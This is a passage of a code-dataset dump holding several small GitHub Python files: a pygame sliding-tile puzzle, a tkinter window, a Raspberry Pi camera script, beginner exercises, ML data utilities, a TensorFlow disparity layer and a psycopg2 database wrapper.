FFT.png')\n\n\nmain()","repo_name":"LookRain/CS4347","sub_path":"Assignment5/assignment5_part1.py","file_name":"assignment5_part1.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12025510814","text":"import pandas as pd\nimport json\n\nmain_data = pd.read_csv(r\"C:/Users/Dell/sequentialPlotViewer/data/allergyBoundelss.csv\")\ndata_point = pd.read_csv(r\"C:/Users/Dell/sequentialPlotViewer/data/allergy_test.csv\")\n\nselected_graph = \"bargraph\"\n\nbar_data = main_data[main_data.plottype == selected_graph]\ncnt = 0\n\nfor index, data in bar_data.iterrows():\n cnt += 1\n constraints = json.loads(data.slice)\n fdata = data_point\n \n for i, j in constraints.items():\n fdata = fdata[fdata[i] == j]\n \n ","repo_name":"vraj152/sequential-plot-viewer","sub_path":"reading_data.py","file_name":"reading_data.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31874929524","text":"import pygame\nimport random\nimport os\nfrom settings import *\n\n\n# Tile class is dedicated to create tiles\nclass Tile(pygame.sprite.Sprite): # import sprites as pygame class in its parameter\n def __init__(self, game, x, y, text):\n pygame.font.init() # import fonts\n self.groups = game.sprites\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pygame.Surface((TILESIZE, TILESIZE)) # Create tile surface\n self.x, self.y = x, y\n self.text = text # Take a number converted into a str\n self.rect = self.image.get_rect()\n if self.text != \"empty\":\n self.font = pygame.font.SysFont(\"Georgia\", 50) # Choose a font and its size\n font_surface = self.font.render(self.text, True, BLACK) # Apply font on text\n self.image.fill(MAGENTA) # Color tile surface\n self.font_size = self.font.size(self.text)\n draw_x = (TILESIZE / 2) - self.font_size[0] / 2\n draw_y = (TILESIZE / 2) - self.font_size[1] / 2\n self.image.blit(font_surface, (draw_x, draw_y))\n else:\n self.image.fill(BLACK) # Empty tile has a different color\n\n def update(self):\n self.rect.x = self.x * TILESIZE\n self.rect.y = self.y * TILESIZE\n\n def click(self, mouse_x, mouse_y): # Function which read mouse position on a tile\n return self.rect.left <= mouse_x <= self.rect.right and self.rect.top <= mouse_y <= self.rect.bottom\n\n # Direction will be used to check if an empty tile can be moved with mouse or arrows\n def left(self):\n return self.rect.x - TILESIZE >= 0\n\n def up(self):\n return self.rect.y - TILESIZE >= 0\n\n def right(self):\n return self.rect.x + TILESIZE < GAMESIZE * TILESIZE\n\n def down(self):\n return self.rect.y + TILESIZE < GAMESIZE * TILESIZE\n\n # Function which binds arrows keys to the game\n def move_tiles(self, key):\n for row, tiles in enumerate(self.tiles):\n for col, tile in enumerate(tiles):\n # Check if empty tile can be moved to a direction, then invert empty tile with a tile\n if key == pygame.K_LEFT:\n if tile.right() and self.tiles_grid[row][col + 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][col + 1], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_RIGHT:\n if tile.left() and self.tiles_grid[row][col - 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][\n col - 1], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_UP:\n if tile.down() and self.tiles_grid[row + 1][col] 
== 0:\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][\n col], \\\n self.tiles_grid[row][col]\n return True\n elif key == pygame.K_DOWN:\n if tile.up() and self.tiles_grid[row - 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][\n col], \\\n self.tiles_grid[row][col]\n return True\n return False\n\n\nclass GraphicText: # Will display text next to the puzzle\n def __init__(self, x, y, text):\n self.x = x\n self.y = y\n self.text = text\n\n def draw(self, screen):\n font = pygame.font.SysFont(\"Georgia\", 30)\n text = font.render(self.text, True, WHITE)\n screen.blit(text, (self.x, self.y))\n\n\nclass Button: # Class making buttons\n def __init__(self, x, y, width, height, text, color, text_color): # Parameters\n self.color, self.text_color = color, text_color\n self.width, self.height = width, height\n self.x, self.y = x, y\n self.text = text\n\n def draw(self, screen): # Uses pygame rect, font and blit functions to draw buttons\n pygame.draw.rect(screen, self.color, (self.x, self.y, self.width, self.height))\n font = pygame.font.SysFont(\"Georgia\", 30)\n text = font.render(self.text, True, self.text_color)\n self.font_size = font.size(self.text)\n draw_x = self.x + (self.width / 2) - self.font_size[0] / 2\n draw_y = self.y + (self.height / 2) - self.font_size[1] / 2\n screen.blit(text, (draw_x, draw_y))\n\n def click(self, mouse_x, mouse_y): # Function which read mouse position on a tile\n return self.x <= mouse_x <= self.x + self.width and self.y <= mouse_y <= self.y + self.height\n\n\nclass PuzzleGame(Tile, GraphicText, Button):\n def __init__(self):\n pygame.init()\n # Basic parameters\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(title)\n self.clock = pygame.time.Clock()\n self.button_list = []\n self.num = 0\n # Parameters for randomize option\n self.prechoice = \"\"\n self.randomizer_timer = 0\n self.start_randomize = False\n\n # Parameters for win condition and to change board size\n self.start_game = False\n self.finished = False\n self.changeboard_size = False\n self.size = [\"3*3\", \"4*4\", \"5*5\"]\n\n # Use for arrow binding and to count time empty tile was displaced\n self.moved = False\n self.movement_count = 0\n\n def init_game(self): # Function used to create tiles_grid, it appends a number in grid\n grid, num = [], 1\n for x in range(GAMESIZE):\n grid.append([])\n for y in range(GAMESIZE):\n grid[x].append(num)\n num += 1\n grid[-1][-1] = 0\n return grid\n\n def randomizer(self): # Create possible direction to go for the empty tile\n # Detect if empty tile can be moved and add directions to list\n moves = []\n for row, tiles in enumerate(self.tiles): # Append moves\n for col, tile in enumerate(tiles):\n if tile.text == \"empty\":\n if tile.left():\n moves.append(\"left\")\n if tile.right():\n moves.append(\"right\")\n if tile.up():\n moves.append(\"up\")\n if tile.down():\n moves.append(\"down\")\n break\n if len(moves) > 0:\n break # Quit the loops when moves are appended to moves list\n\n # Remove a choice that has been used\n if self.prechoice == \"right\":\n moves.remove(\"left\") if \"left\" in moves else moves\n elif self.prechoice == \"left\":\n moves.remove(\"right\") if \"right\" in moves else moves\n elif self.prechoice == \"up\":\n moves.remove(\"down\") if \"down\" in moves else moves\n elif self.prechoice == \"down\":\n moves.remove(\"up\") if \"up\" in moves else moves\n\n # Choose a direction in moves list, invert tiles then 
remove it from the list\n choice = random.choice(moves)\n self.prechoice = choice\n if choice == \"right\":\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][col + 1], \\\n self.tiles_grid[row][col]\n elif choice == \"left\":\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][col - 1], \\\n self.tiles_grid[row][col]\n elif choice == \"up\":\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][col], \\\n self.tiles_grid[row][col]\n elif choice == \"down\":\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][col], \\\n self.tiles_grid[row][col]\n\n def draw_tiles(self):\n # Uses tiles.grid, made by init-game(), in a nested loop to create tiles by invoking the Tile Class.\n self.tiles = []\n for row, x in enumerate(self.tiles_grid):\n self.tiles.append([])\n for col, tile in enumerate(x):\n if tile != 0:\n self.tiles[row].append(Tile(self, col, row, str(tile)))\n else:\n self.tiles[row].append(Tile(self, col, row, \"empty\"))\n\n def new(self):\n self.sprites = pygame.sprite.Group()\n self.tiles_grid = self.init_game()\n self.ordered_tiles = self.init_game()\n\n self.start_game = False\n self.button_list.append(Button(655, 170, 190, 50, \"Randomize\", BEIGE, BLACK))\n self.button_list.append(Button(640, 240, 60, 50, \"3*3\", BEIGE, BLACK))\n self.button_list.append(Button(720, 240, 60, 50, \"4*4\", BEIGE, BLACK))\n self.button_list.append(Button(800, 240, 60, 50, \"5*5\", BEIGE, BLACK))\n self.draw_tiles()\n\n def run(self):\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n self.draw()\n\n def draw_grid(self): # Draw a grid by using draw.line()\n for row in range(-1, GAMESIZE * TILESIZE, TILESIZE):\n pygame.draw.line(self.screen, LIGHTGREY, (row, 0), (row, GAMESIZE * TILESIZE))\n for col in range(-1, GAMESIZE * TILESIZE, TILESIZE):\n pygame.draw.line(self.screen, LIGHTGREY, (0, col), (GAMESIZE * TILESIZE, col))\n\n def layout(self):\n self.screen.fill(BGCOLOR)\n self.sprites.update()\n self.sprites.draw(self.screen)\n self.draw_grid()\n for button in self.button_list:\n self.str_movement_count = str(self.movement_count)\n button.draw(self.screen)\n GraphicText(695, 80, self.str_movement_count + \" moves\").draw(self.screen)\n numint = int(self.num)\n numint2 = int(self.str_movement_count)\n best = min(numint, numint2) # Find the smallest int, which will be displayed if file is not empty.\n if not os.path.getsize(\"userscore.txt\"):\n GraphicText(610, 380, (\"Best Score : \" + self.str_movement_count)).draw(self.screen)\n else:\n GraphicText(630, 380, (\"Best Score : \" + str(best))).draw(self.screen)\n if self.finished is True:\n GraphicText(630, 430, \"You won with \" + self.str_movement_count + \" moves\").draw(self.screen)\n\n def draw(self):\n self.layout()\n # Change board size by using new()\n if self.changeboard_size is True:\n self.new()\n self.changeboard_size = False\n self.str_movement_count = \"\"\n\n # Check if the puzzle is resolved, then write result in a file if it's better than previous one\n if self.start_game:\n if self.tiles_grid == self.ordered_tiles:\n self.finished = True\n self.start_game = False\n with open('userscore.txt', 'r+') as self.file:\n try:\n self.best_score = self.file.readline()\n self.num, self.text = self.best_score.split()\n except:\n if not os.path.getsize(\"userscore.txt\") or int(self.str_movement_count) < int(self.num):\n self.file.seek(0, 0)\n 
self.file.write(str(self.str_movement_count) + \" moves\")\n if self.start_randomize: # When start_randomize is true, run randomizer(), which shuffles the tiles for 80 frames.\n self.randomizer()\n self.draw_tiles()\n self.randomizer_timer += 1\n if self.randomizer_timer > 80:\n self.start_randomize = False\n self.start_game = True\n self.movement_count = 0\n pygame.display.flip()\n\n def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Allows user to quit game\n pygame.quit()\n quit(0)\n if event.type == pygame.KEYDOWN: # User pressed an arrow key, so the empty tile is moved using move_tiles()\n if event.key in [pygame.K_LEFT, pygame.K_RIGHT, pygame.K_UP, pygame.K_DOWN]:\n self.moved = self.move_tiles(event.key)\n if self.moved:\n self.draw_tiles()\n self.movement_count += 1\n\n # Get mouse position, and exchange the clicked tile with the empty one\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n for row, tiles in enumerate(self.tiles):\n for col, tile in enumerate(tiles):\n if tile.click(mouse_x, mouse_y):\n if tile.right() and self.tiles_grid[row][col + 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col + 1] = self.tiles_grid[row][\n col + 1], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.left() and self.tiles_grid[row][col - 1] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row][col - 1] = self.tiles_grid[row][\n col - 1], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.up() and self.tiles_grid[row - 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row - 1][col] = self.tiles_grid[row - 1][\n col], self.tiles_grid[row][col]\n self.movement_count += 1\n if tile.down() and self.tiles_grid[row + 1][col] == 0:\n self.tiles_grid[row][col], self.tiles_grid[row + 1][col] = self.tiles_grid[row + 1][\n col], self.tiles_grid[row][col]\n self.movement_count += 1\n self.draw_tiles()\n\n global GAMESIZE # declare this global so the user can modify the grid size by pressing the size buttons\n for button in self.button_list: # Check if a button is clicked, then activate booleans\n if button.click(mouse_x, mouse_y):\n if button.text == \"Randomize\":\n self.randomizer_timer = 0\n self.start_randomize = True\n\n # Change board size parameters\n if button.text == self.size[0]:\n GAMESIZE = 3\n self.changeboard_size = True\n if button.text == self.size[1]:\n GAMESIZE = 4\n self.changeboard_size = True\n if button.text == self.size[2]:\n GAMESIZE = 5\n self.changeboard_size = True\n\n\n# Create a PuzzleGame object, then call its new and run functions\ngame = PuzzleGame()\nif __name__ == '__main__':\n game.new()\n game.run()\n","repo_name":"abraham-saindou/puzzle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8570921432","text":"from tkinter import *\n\n\ndef finish():\n root.destroy() # manually close the window and the whole application\n print('Closing the application')\n\n\nroot = Tk()\nroot.geometry('300x200')\n\nroot.title('Hello world')\nroot.protocol(\"WM_DELETE_WINDOW\", finish)\n\nroot.mainloop()\n","repo_name":"Nikpell/Python","sub_path":"PqQt/pythonProject/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"28710176711","text":"#!/usr/bin/env python3\n\nfrom picamera import PiCamera\nfrom time import 
sleep\nimport datetime\nimport os\nfrom gpiozero import LED\nimport csv\n\n\n#### GET THE MOST RECENT VALUE FROM THE LIGHTLUX CSV FILE ####\ndef readCSV():\n\tcsvFile = 'lightlux.csv'\n\twith open(csvFile) as f:\n\t\tcsv_reader = csv.reader(f, delimiter=',')\n\t\tlineCount =0\n\t\tfor row in f:\n\t\t\tlineCount +=1\n\twith open(csvFile) as d:\n\t\tcsv_reader = csv.reader(d, delimiter=',')\n\t\tlineCount2 = 0\n\t\tfor row in d:\n\t\t\tlineCount2 +=1\n\t\t\tif lineCount2 == lineCount:\n\t\t\t\trow = row.split(',')\n\t\t\t\tlightVal = row[1]\n\t\t\t\t#print(row)\n\t\treturn lightVal\nlightVal = int(readCSV())\n########################\nled1 = LED(23)\nled2 = LED(24)\nled1.on()\nled2.on()\ncamera = PiCamera()\n#### READ THE LIGHTLUX CSV AND IF THE VALUE IS 0, THEN INITIATE NIGHT MODE ####\nif lightVal ==0:\n\tcamera.start_preview()\n\tsleep(2)\n\tnow = datetime.datetime.now()\n\tdir = \"images/%s\" % now.strftime(\"%Y-%m-%d\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tcamera.ISO = 100\n\tgains = (8,8)\n\tcamera.awb_mode = 'off'\n\tcamera.awb_gains = gains\n\tcamera.capture('%s/%s.png' % (dir, now.strftime(\"%H:%M:%S\")))\n\n\n#### IF THE LIGHTLUX CSV VALUE IS GREATER THAN 0, INITIATE AUTOMATIC CAMERA SETTINGS ####\nif lightVal >0:\n\tcamera.start_preview()\n\tsleep(2)\n\tnow = datetime.datetime.now()\n\tdir = \"images/%s\" % now.strftime(\"%Y-%m-%d\")\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\tgains2 = (0.74,1.18)\n\tcamera.awb_mode = 'off'\n\tcamera.awb_gains = gains2\n\tcamera.capture('%s/%s.png' % (dir, now.strftime(\"%H:%M:%S\")))\n\n\ncamera.stop_preview()\nled1.off()\nled2.off()\n","repo_name":"AutomatedFieldPhenomics/Local-Temperature-Measurements","sub_path":"captureNightToo.py","file_name":"captureNightToo.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"24094693460","text":"#Write a program that prompts the user to enter a file name, reads the contents of the file and prints it to the screen.\n\nfileName = input(\"Please enter a file name \")+ \".txt\"\n\ndef main(x):\n fh = open(x, 'r') # use the parameter that was passed in, not the global\n contents = fh.read()\n fh.close()\n print(contents)\n\n\nmain(fileName)\n","repo_name":"joshwestbury/Digital_Crafts","sub_path":"python_exercises/py_part4_ex/I_O/1_ex.py","file_name":"1_ex.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40798681630","text":"# Build a dictionary of n elements, where key = n and value = (1 + 1/n)^n, and print it\n# to the screen. Example: for n = 6: {1: 4, 2: 7, 3: 10, 4: 13, 5: 16, 6: 19}\nn = int(input('Enter the number n of dictionary elements: '))\ndictionary = {}\nprint(dictionary)\n\nfor i in range(1,n+1):\n dictionary[i] = round((1 + 1/i)**i,3) # use the key i itself; mutating n inside the loop skewed the values\nprint(dictionary)\n","repo_name":"EvgeniyMastyukov/Pythone_Seminar2","sub_path":"Task_17_Dom.py","file_name":"Task_17_Dom.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"25492422842","text":"smallest = 0\nlargest = 0\nwhile True:\n\tnum = int(input(\"Please input a number: \")) # int() returns a new value, so it must be assigned\n\tprint(type(num))\n\t# type(smallest)\n\t# if num < smallest:\n\t#\tsmallest = num\n\t#if num > largest:\n\t#\tlargest = num\nprint(\"Smallest:\",smallest)\nprint(\"largest:\", largest)\n","repo_name":"woleywa/python_for_everybody","sub_path":"1_class/Week7/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"23437429615","text":"\"\"\"\nutility functions for the camouflage experiments\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\nimport numpy as np\nfrom sklearn.metrics.pairwise import rbf_kernel\nimport os\nimport math\n\n\ndef select_instances(X, Y, indices):\n \"\"\"\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of floats, the target values\n :param indices: numpy 1D array of ints, the indices to extract\n \"\"\"\n return X[indices], Y[indices]\n\n\ndef unpickle(file):\n \"\"\"\n load the file\n :param file: string, path to the file\n :return dict(string, object): the dictionary loaded from file\n \"\"\"\n import pickle\n with open(file, 'rb') as fo:\n data_dict = pickle.load(fo, encoding='latin1')\n return data_dict\n\n\ndef scale_features(cover_X, val_X, test_X):\n \"\"\"\n scale the cover data column-wise to unit L2 norm, apply the same\n transformation to the validation and test data\n :param cover_X: numpy 2D array of floats, the feature vectors for the\n cover data\n :param val_X: numpy 2D array of floats, the feature vectors for the\n validation data\n :param test_X: numpy 2D array of floats, the feature vectors for the\n test data\n :return numpy 2D array of floats, the scaled features of the cover data\n numpy 2D array of floats, the scaled features of the val data\n numpy 2D array of floats, the scaled features of the test data\n \"\"\"\n '''\n dim_mins, dim_maxs = np.amin(cover_X, axis=0), np.amax(cover_X, axis=0)\n diffs = dim_maxs - dim_mins\n\n apply_transformation = lambda X, dim_mins, diffs: (X - dim_mins) / diffs\n\n return\n apply_transformation(cover_X, dim_mins, diffs),\n apply_transformation(val_X, dim_mins, diffs),\n apply_transformation(test_X, dim_mins, diffs)\n '''\n norms = np.sum(cover_X**2, axis=0)\n norms = np.sqrt(norms)\n apply_transformation = lambda X, square_sums: X / square_sums\n\n return apply_transformation(cover_X, norms), \\\n apply_transformation(val_X, norms), \\\n apply_transformation(test_X, norms)\n\n\ndef load_dataset(input_dir):\n \"\"\"\n load dataset from a given directory\n :param input_dir: string, path to the input dir\n :return numpy 2D array of floats, the feature vectors for the cover data\n numpy 1D array of floats, the target values for the cover data\n numpy 2D array of floats, the feature vectors for the val data\n numpy 1D array of floats, the target values for the val data\n numpy 2D array of floats, the 
feature vectors for the test data\n numpy 1D array of floats, the target values for the test data\n numpy 2D array of floats, the kernel matrix for the cover data\n \"\"\"\n # load the features\n cover_fname = os.path.join(input_dir, 'cover.npz')\n val_fname = os.path.join(input_dir, 'val.npz')\n test_fname = os.path.join(input_dir, 'test.npz')\n cover_data, val_data, test_data = \\\n np.load(cover_fname), np.load(val_fname), np.load(test_fname)\n cover_X, cover_Y, val_X, val_Y, test_X, test_Y = \\\n cover_data['X'], cover_data['Y'], val_data['X'], val_data['Y'], \\\n test_data['X'], test_data['Y']\n\n # load the kernel matrix\n kernel_fname = os.path.join(input_dir, 'kernel.npy')\n kernel_matrix = np.load(kernel_fname)\n return cover_X, cover_Y, val_X, val_Y, test_X, test_Y, kernel_matrix\n\n\ndef load_data(input_fname):\n \"\"\"\n load the dataset\n :param input_fname: string, path to npz file containing the dataset\n :return numpy 2D array of floats, the feature vectors\n numpy 1D array of floats, the corresponding target values\n \"\"\"\n data = np.load(input_fname)\n return data['X'], data['Y']\n\n\ndef get_median_distance(X):\n \"\"\"\n get the median distance between all pairs of points\n :param X: numpy 2D array of floats, the feature vectors\n :return float, the median distance\n \"\"\"\n num_instances = len(X)\n num_distances = num_instances * (num_instances - 1) // 2\n distance_array = np.zeros(num_distances)\n distance_index = 0\n\n for i in range(num_instances):\n for j in range(num_instances):\n if i < j:\n distance_array[distance_index] = np.linalg.norm(X[i] - X[j])\n distance_index += 1\n\n distance_array = np.sort(distance_array)\n return distance_array[num_distances // 2] # return the median\n\n\ndef get_max_distance(X):\n \"\"\"\n get the maximum distance between point pairs\n :param X: numpy 2D array of floats, the feature vectors\n :return float, the maximum distance\n \"\"\"\n max_dist = 0\n num_instances = len(X)\n\n for i in range(num_instances):\n for j in range(num_instances):\n if i < j:\n dist = np.linalg.norm(X[i] - X[j])\n if dist > max_dist:\n max_dist = dist\n\n return max_dist\n\n\ndef max_class_distance(X, Y):\n \"\"\"\n get the maximum distance between point pairs within the same class\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the target values\n :return float, the maximum distance\n \"\"\"\n pos_X, neg_X = [], []\n\n for index, y in enumerate(Y):\n if y == 1:\n pos_X.append(X[index])\n else:\n neg_X.append(X[index])\n\n # compute the per-class maxima; passing the full X here ignored the class split\n pos_dist = get_max_distance(pos_X)\n neg_dist = get_max_distance(neg_X)\n\n if pos_dist > neg_dist:\n return pos_dist\n else:\n return neg_dist\n\n\ndef generate_kernel_matrix(X, Y, include_Y=True):\n \"\"\"\n generate kernel matrix, chooses the bandwidth dynamically\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the target values\n :param include_Y: boolean, if True then add a scaled version of the target\n in features for kernel calculation, default True\n :return numpy 2D array of floats, the kernel matrix\n \"\"\"\n sigma = get_median_distance(X)\n gamma = 1 / (2 * sigma**2)\n\n # include Y in kernel matrix\n if include_Y:\n max_class_dist = max_class_distance(X, Y)\n\n # set labels to either 0 or max_class_dist\n tempY = np.zeros(len(Y))\n for index, y in enumerate(Y):\n if y == 1:\n tempY[index] = max_class_dist\n kernel_X = np.hstack((X, tempY.reshape(-1, 1)))\n\n return rbf_kernel(kernel_X, gamma=gamma)\n\n # include_Y is False: build the kernel from the features alone\n return rbf_kernel(X, gamma=gamma) # ignoring Y in the kernel 
matrix\n\n\ndef create_folds(X, Y, num_folds):\n \"\"\"\n create folds for cross validation\n :param X: numpy 2D array of floats, the feature vectors\n :param Y: numpy 1D array of ints, the corresponding labels\n :param num_folds: int, number of folds\n :return list(numpy 2D array of floats), the folds for feature vectors\n list(numpy 1D array of ints), the corresponding labels\n \"\"\"\n size = len(X)\n assert(size == len(Y))\n fold_size = math.ceil(size / num_folds)\n\n indices = np.array(range(size))\n np.random.shuffle(indices)\n\n fold_X, fold_Y = [], []\n\n for i in range(num_folds):\n start_index = i * fold_size\n end_index = (i + 1) * fold_size\n\n if end_index > size:\n end_index = size\n\n fold_indices = indices[start_index: end_index]\n fold_X.append(X[fold_indices])\n fold_Y.append(Y[fold_indices])\n\n return fold_X, fold_Y\n\n\ndef create_train_test_set_from_folds(fold_X, fold_Y):\n \"\"\"\n :param fold_X: list(numpy 2D array of floats), the folds for feature\n vectors\n :param fold_Y: list(numpy 1D array of ints), the corresponding labels\n :return list(numpy 2D array of floats), the list of training sets\n list(numpy 1D array of ints), corresponding list of labels\n list(numpy 2D array of floats), the list of test sets\n list(numpy 1D array of ints), corresponding list of labels\n \"\"\"\n num_folds = len(fold_X)\n assert(num_folds == len(fold_Y))\n\n train_Xs, train_Ys, test_Xs, test_Ys = [], [], [], []\n\n for i in range(num_folds):\n test_X, test_Y = fold_X[i], fold_Y[i]\n\n train_X, train_Y = None, None\n for j in range(num_folds):\n if i == j:\n continue\n\n if train_X is None:\n train_X = fold_X[j]\n train_Y = fold_Y[j]\n else:\n train_X = np.vstack((train_X, fold_X[j]))\n train_Y = np.concatenate((train_Y, fold_Y[j]))\n\n train_Xs.append(train_X)\n train_Ys.append(train_Y)\n test_Xs.append(test_X)\n test_Ys.append(test_Y)\n\n return train_Xs, train_Ys, test_Xs, test_Ys\n","repo_name":"ayonsn017/TrainingSetCamouflage","sub_path":"code/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41112279141","text":"import tensorflow as tf\r\nimport tensorflow.keras as keras\r\n\r\n\r\nclass DisparityComputation(keras.Model):\r\n \"\"\"\r\n Compute disparity using Soft ArgMin.\r\n \"\"\"\r\n def __init__(self, max_disp):\r\n super(DisparityComputation, self).__init__()\r\n self.max_disp = max_disp\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n # inputs: [N, H, W, D], D = 2 * max_disp\r\n assert inputs.shape[-1] == 2 * self.max_disp\r\n\r\n disp_candidates = tf.linspace(-1.0 * self.max_disp, 1.0 * self.max_disp - 1.0, 2 * self.max_disp)\r\n prob_volume = tf.math.softmax(-1.0 * inputs, -1)\r\n disparity = tf.reduce_sum(disp_candidates * prob_volume, -1, True)\r\n\r\n return disparity # [N, H, W, 1]\r\n","repo_name":"Sheng029/HMSM-Net","sub_path":"US3D/StereoNet/computation.py","file_name":"computation.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"25562521725","text":"from __future__ import absolute_import\n\nimport re\n\nimport psycopg2.extensions\nimport psycopg2.extras\n\nfrom libtart.helpers import singleton\nfrom libtart.collections import OrderedCaseInsensitiveDict\n\n# These are not necessary with Python 
3.\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODE)\npsycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)\n\ndebug = False\n\n@singleton\nclass connection(psycopg2.extensions.connection):\n \"\"\"The purpose of the class is to add practical functions to the connection class on the psycopg2 library.\n Unlike the parent class autocommit enabled by default, disabled on demand.\"\"\"\n\n def __init__(self, dsn=''):\n psycopg2.extensions.connection.__init__(self, dsn)\n self.set_client_encoding('utf8')\n self.autocommit = True\n psycopg2.extras.register_hstore(self)\n self.__registerCompositeTypes()\n\n def __registerCompositeTypes(self):\n for row in self.__execute('''\nSelect typname\n from pg_type\n where typcategory = 'C'\n and (typnamespace in (select oid\n from pg_namespace\n where nspname !~ 'pg_*'\n and nspname != 'information_schema')\n or typname = 'record')'''):\n psycopg2.extras.register_composite(str(row['typname']), self, factory=OrderedCaseInsensitiveDictComposite)\n\n def __enter__(self):\n self.autocommit = False\n return psycopg2.extensions.connection.__enter__(self)\n\n def __exit__(self, *args):\n psycopg2.extensions.connection.__exit__(self, *args)\n self.autocommit = True\n\n def cursor(self, *args, **kwargs):\n kwargs.setdefault('cursor_factory', OrderedCaseInsensitiveDictCursor)\n return psycopg2.extensions.connection.cursor(self, *args, **kwargs)\n\n def __execute(self, query, parameters=[], table=True):\n \"\"\"Execute a query on the database; return None, the value of the cell, the values in the row in\n a dictionary or the values of the rows in a list of dictionary.\"\"\"\n\n with self.cursor() as cursor:\n if debug:\n print('QUERY: ' + str(cursor.mogrify(query, list(parameters))))\n\n try:\n cursor.execute(query, list(parameters))\n except psycopg2.ProgrammingError as error:\n raise ProgrammingError(error)\n except psycopg2.IntegrityError as error:\n raise IntegrityError(error)\n\n if table:\n if cursor.rowcount > 0:\n return cursor.fetchall()\n\n return []\n\n if cursor.rowcount == 0:\n raise NoRow('Query does not return any rows.')\n\n if cursor.rowcount > 1:\n raise MoreThanOneRow('Query returned more than one row.')\n\n if len(cursor.description) == 1:\n for cell in cursor.fetchone().values():\n return cell\n\n if len(cursor.description) > 1:\n return cursor.fetchone()\n\n def call(self, functionName, parameters=[], table=False):\n \"\"\"Call a function inside the database with the given arguments.\"\"\"\n\n query = 'Select * from ' + functionName + '('\n if isinstance(parameters, dict):\n query += ', '.join(k + ' := %s' for k in parameters.keys())\n parameters = parameters.values()\n elif isinstance(parameters, list) or isinstance(parameters, tuple):\n query += ', '.join(['%s'] * len(parameters))\n elif parameters is None:\n parameters = []\n else:\n query += '%s'\n parameters = [parameters]\n query += ')'\n\n return self.__execute(query, parameters, table)\n\n def callTable(self, *args):\n return self.call(*args, table=True)\n\n def select(self, tableName, where={}, orderBy=None, limit=None, offset=None, table=True):\n \"\"\"Execute a select query from a single table.\"\"\"\n\n query = 'Select * from ' + tableName + self.whereClause(where)\n if orderBy:\n if isinstance(orderBy, tuple):\n query += ' order by ' + ', '.join(orderBy)\n else:\n query += ' order by ' + str(orderBy)\n if limit:\n query += ' limit ' + str(limit)\n if offset:\n query += ' offset ' + str(offset)\n\n return self.__execute(query, where.values(), table)\n\n 
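# Example usage (editor's sketch; 'person' is a hypothetical table name):\n #   db.select('person', {'name': 'x'})   # -> list of row dicts\n #   db.selectOne('person', {'id': 1})    # -> one row; raises NoRow / MoreThanOneRow otherwise\n\n 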
